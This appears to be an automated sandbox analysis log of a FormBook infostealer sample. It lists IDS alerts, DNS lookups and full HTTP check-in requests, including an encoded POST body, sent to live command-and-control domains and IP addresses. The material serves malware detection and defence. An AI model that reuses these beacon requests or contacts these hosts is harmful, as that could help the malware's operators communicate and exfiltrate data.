Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49747 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49754 -> 103.248.137.209:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49740 -> 217.70.184.50:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49740 -> 217.70.184.50:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49771 -> 104.21.11.31:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49739 -> 217.70.184.50:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49743 -> 172.96.187.60:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49748 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49751 -> 67.223.117.189:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49768 -> 85.153.138.113:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49744 -> 172.96.187.60:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49757 -> 103.248.137.209:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49760 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49753 -> 67.223.117.189:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49757 -> 103.248.137.209:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49746 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49752 -> 67.223.117.189:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49753 -> 67.223.117.189:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49738 -> 217.70.184.50:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49762 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49765 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49765 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49759 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49769 -> 85.153.138.113:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49769 -> 85.153.138.113:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49764 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49770 -> 104.21.11.31:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49766 -> 85.153.138.113:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49761 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49761 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49745 -> 172.96.187.60:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49745 -> 172.96.187.60:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49763 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49772 -> 104.21.11.31:80
            Source: DNS query: www.heldhold.xyz
Source: Joe Sandbox View | IP Address: 67.223.117.189
Source: Joe Sandbox View | IP Address: 217.70.184.50
Source: Joe Sandbox View | ASN Name: VIMRO-AS15189US
Source: Joe Sandbox View | ASN Name: SINGLEHOP-LLCUS
Source: Joe Sandbox View | ASN Name: DNC-ASDimensionNetworkCommunicationLimitedHK
Source: Joe Sandbox View | ASN Name: GANDI-ASDomainnameregistrar-httpwwwgandinetFR
Source: Joe Sandbox View | ASN Name: REGISTER-ASIT
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 11 times)
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_007E2404 InternetReadFile,InternetQueryDataAvailable,InternetReadFile
Source: global traffic | HTTP traffic detected:
    GET /a4ar/?n0=mTk8u4lhzbnhVh&PR_xXrA=bigEPZ6XMKFUrjbnFuEouLJTNPVDiP/j9U81Matj+rZ/AUf1cwoUFkvfutX9dfv4h0MjihypUwM2GA6oEMuOAdNfbVj3/yE4LVCgAj4ckDbKMFX8mxMH3uQ= HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Host: www.2bhp.com
    Connection: close
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
Source: global traffic | HTTP traffic detected:
    GET /8pln/?PR_xXrA=T9/DtY4QstE2hf5O1waUB+I/eJ4Uv9cvfz5cQjr/yHb6PkgoDrQz8TZtAEENUqwsBaW/Syqgj8DnNvIHzYG9oL792aB/FoBSyK+aeSTPR1nXcfMqNX8wInY=&n0=mTk8u4lhzbnhVh HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Host: www.ultraleap.net
    Connection: close
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
Source: global traffic | HTTP traffic detected:
    GET /v2c3/?n0=mTk8u4lhzbnhVh&PR_xXrA=4KW7rJi8xQgG5Juif0zvrQruwxJNCZQzPrutLC9Z2JC7riozJk19TyUHcpxc9ASY/m5rLPYp2hVK9kL/MGxev+uUFboPihN5w7Wu/KeDCgTl/GYzmTNxclA= HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Host: www.dalong.site
    Connection: close
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
Source: global traffic | HTTP traffic detected:
    GET /xamn/?PR_xXrA=eI40u+kXl6dCNOxuFKbCigR1N86mEgfKXPnA2oRVh57cb1FOyw5acKt1uSVkrtOGePUCnlUQIJS7kZjahSWR6R1adFopucWDE2ha6/s1PPXDYip6cFIdDHY=&n0=mTk8u4lhzbnhVh HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Host: www.mgeducacaopro.online
    Connection: close
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
Source: global traffic | HTTP traffic detected:
    GET /fava/?PR_xXrA=GCDZpLqdSYk7fT5CRgwCB4qcStchn8AdfdSMH3wAhEJHSlsoeLITVJbnCwS/lbUV+KMqaRxHJZIr2IJ0lKwQCgtKpqiTYCqf8kUZvClY0WdZB6RiKYyZbbU=&n0=mTk8u4lhzbnhVh HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Host: www.heldhold.xyz
    Connection: close
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /5o7d/?PR_xXrA=zMeRclQqEZ6cHEksxL2258xeQPEFk6LXLXq5VQFXrGMOKBUumeR2nXgC5pr3HgG3QDdipY9Tb1BbXYBiFpGduAov/pmUDz/4soHslE7c+cNQZpL9+8t0WKA=&n0=mTk8u4lhzbnhVh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.63582.photoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /kt2f/?PR_xXrA=3qIRfQl/AKdo1myUuOHVh1YjbZAZzTLYZ4NmxJouZDst8nFYGFmfJjzqUfk6VEmL81v5o0lFZhte5+gDx+sfFJzn9v28G/J2fr9BwA1qwWv9b12erCAk53Y=&n0=mTk8u4lhzbnhVh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.asiapartnars.onlineConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /al6z/?n0=mTk8u4lhzbnhVh&PR_xXrA=VRCNh0NW0GgzXjJ9PdlWfXWwdPKpBv6LK6gi/31OI/HLVz3edLOFPgfBWIIFI1yv4KnHdZ/ByCAdRrOw29Cps8gpdM+xYTm/p50f5dz2MVQM3pqegGrg4cw= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.linkwave.cloudConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /3lu7/?PR_xXrA=nzWofdhWpyQTuQkDfxpOhZSR2SP28ZN4SJ26h7kwykQFM8AQx5IfrLSrYivs6QFJHI8FrKvcoPkOi5L1XFRCLbCiXi5UAF8H0knLfKrCbz8tBFYRfGccZ0A=&n0=mTk8u4lhzbnhVh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mfgarage.netConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /zznj/?n0=mTk8u4lhzbnhVh&PR_xXrA=XN/afWzprYUm2zEh/Me8v7IO6BZfJ8ldqsTKqfvYzDGyGH3Qqe2ibLEK4zu3d4hkDWgHsBH7o/PgLSUsZsuwL2SV1lDf+BUf6ZfDIcx/0TWTXhhDzyKZrRs= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.b5x7vk.agencyConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global traffic | DNS traffic detected: DNS query: www.2bhp.com
            Source: global traffic | DNS traffic detected: DNS query: www.ultraleap.net
            Source: global traffic | DNS traffic detected: DNS query: www.dalong.site
            Source: global traffic | DNS traffic detected: DNS query: www.mgeducacaopro.online
            Source: global traffic | DNS traffic detected: DNS query: www.heldhold.xyz
            Source: global traffic | DNS traffic detected: DNS query: www.63582.photo
            Source: global traffic | DNS traffic detected: DNS query: www.useanecdotenow.tech
            Source: global traffic | DNS traffic detected: DNS query: www.asiapartnars.online
            Source: global traffic | DNS traffic detected: DNS query: www.linkwave.cloud
            Source: global traffic | DNS traffic detected: DNS query: www.mfgarage.net
            Source: global traffic | DNS traffic detected: DNS query: www.b5x7vk.agency
            Source: unknownHTTP traffic detected: POST /8pln/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateHost: www.ultraleap.netOrigin: http://www.ultraleap.netContent-Length: 204Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeReferer: http://www.ultraleap.net/8pln/User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36Data Raw: 50 52 5f 78 58 72 41 3d 65 2f 58 6a 75 76 46 59 68 35 34 77 34 36 70 41 31 52 66 4e 51 72 73 6b 61 4b 4d 33 35 76 51 7a 47 57 52 74 63 31 66 38 33 30 62 31 4a 32 38 54 46 74 63 79 2b 44 4e 50 4c 41 73 55 63 6f 4e 74 50 70 6e 76 58 68 6d 33 72 38 48 6b 4b 75 77 70 76 39 69 48 6f 37 6a 45 77 70 42 4e 61 49 78 51 76 36 4f 4b 59 53 36 7a 5a 32 50 51 61 72 4d 72 4d 43 34 36 48 6b 76 6b 49 63 47 36 46 6e 6e 43 68 55 32 55 4c 69 43 57 57 52 4a 79 36 78 45 50 35 46 42 39 4b 76 44 46 72 55 6d 70 2b 51 72 33 6a 76 6d 39 63 42 63 65 56 73 4c 48 56 55 55 63 2b 39 67 31 66 62 72 70 56 46 65 49 5a 7a 77 55 46 41 3d 3d Data Ascii: PR_xXrA=e/XjuvFYh54w46pA1RfNQrskaKM35vQzGWRtc1f830b1J28TFtcy+DNPLAsUcoNtPpnvXhm3r8HkKuwpv9iHo7jEwpBNaIxQv6OKYS6zZ2PQarMrMC46HkvkIcG6FnnChU2ULiCWWRJy6xEP5FB9KvDFrUmp+Qr3jvm9cBceVsLHVUUc+9g1fbrpVFeIZzwUFA==
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 25 Sep 2024 10:46:29 GMT | Server: Apache | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /a4ar/ was not found on this server.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Wed, 25 Sep 2024 10:47:00 GMT | server: LiteSpeed | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Wed, 25 Sep 2024 10:47:03 GMT | server: LiteSpeed | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Wed, 25 Sep 2024 10:47:05 GMT | server: LiteSpeed | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Wed, 25 Sep 2024 10:47:08 GMT | server: LiteSpeed | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 25 Sep 2024 10:47:27 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 32106 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html | Data Raw: [truncated hex dump of the HTML 404 page omitted]
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 25 Sep 2024 10:47:29 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 32106 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html | Data Raw: [truncated hex dump of the HTML 404 page omitted]
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 25 Sep 2024 10:47:32 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 32106 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html | Data Raw: [truncated hex dump of the HTML 404 page omitted]
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 25 Sep 2024 10:47:34 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 32106 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html; charset=utf-8 | Data Raw: [truncated hex dump of the HTML 404 page omitted]
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 10:49:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ouS10xTwD8ru2V88eyeaUNzDjjw3jcB4v0AGRb785Rx3vIc0iiXEEnHV%2FqKaKJt1ZsnwxtmHdX7wth%2FnmdEatUUiL%2Bh%2FJ7DHbeCP2TPGIf%2BFlS6sFwN5hHHXVXWCxJIGz6a9eA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8a7202efc44370-EWRContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 10:49:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7WQdDnWPed89HzWGgTf51KdnXSFEtI3uir7Bx6AExEa38vvlI2f7jwfuMiuX1GLk3qOM%2F%2FpJV5mKz%2FBAdiMSqk39Uo9HMeDDxeIB%2Blsq38rNqa44wCocskp54eRP323TYLhToQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8a7212b843438b-EWRContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 10:49:09 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Di8wk5AqH3nA9jjmt6k2vVl9RnR7jhFGrz0ojU7e09kNJ%2BtxUYtIa5ipTpIiYztYEA19NgnQLpOw2wE8JLB58Z5zfQL%2B5vhXHa%2Bad0LpMFY4Lsv8M7LLyYsX5NV5Tl9sAr85cw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8a72244da2b9c5-EWRContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 10:49:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b02zpv%2BTZ0k02sDOFHzZyUuvMqFcsCQ9EePCYzr5Vhd53SM5QjSsLymWlfvnX7C8qeaGAQhvzwffFkaham4A45glhKEdHLAUitxRVxuStlepiJqHDWEB7P5REusFuPVgAtGQsg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8a7235eb98c461-EWRData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
